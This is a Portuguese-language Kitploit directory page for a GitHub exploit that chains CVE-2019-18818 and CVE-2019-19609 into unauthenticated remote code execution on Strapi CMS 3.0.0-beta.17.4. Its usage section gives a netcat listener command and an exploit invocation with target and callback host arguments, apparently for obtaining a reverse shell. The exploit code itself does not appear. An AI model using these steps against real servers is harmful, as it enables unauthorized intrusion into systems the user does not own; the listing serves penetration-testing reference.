Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-19609 — Strapi CMS 3.0.0-beta.17.4 - Execução Remota de Código Não Autenticada (CVE-2019-18818, CVE-2019-19609) | Kitploit
Ferramentas/GitHubGitHub/glowbase/cve-2019-19609
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubglowbase/cve-2019-19609

CVE-2019-19609

Strapi CMS 3.0.0-beta.17.4 - Execução Remota de Código Não Autenticada (CVE-2019-18818, CVE-2019-19609)

Ver Repositório
21há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit do Strapi CMS

Este exploit tem como alvo duas vulnerabilidades no Strapi CMS Framework versão 3.0.0-beta-17.4 permitindo execução remota de código não autenticada (RCE).

 

Vulnerabilidades

CVE-2019-18818

Mecanismo Fraco de Recuperação de Senha para Senha Esquecida

CVSS: 9.8 - Crítico

Mais detalhes: https://nvd.nist.gov/vuln/detail/CVE-2019-18818

CVE-2019-19609

Neutralização Inadequada de Elementos Especiais usados em um Comando do SO ('Injeção de Comando no SO')

CVSS: 7.2 - Alto

Mais detalhes: https://nvd.nist.gov/vuln/detail/CVE-2019-19609

 

Uso:

Antes de executar este exploit, inicie um listener netcat na lport que você especificar nas opções abaixo.

Iniciar listener netcat

root@kitploit:~
nc -lnvp <lport>

Executar exploit

root@kitploit:~
exploit.py <rhost> <lhost> <lport>
Baixar ferramenta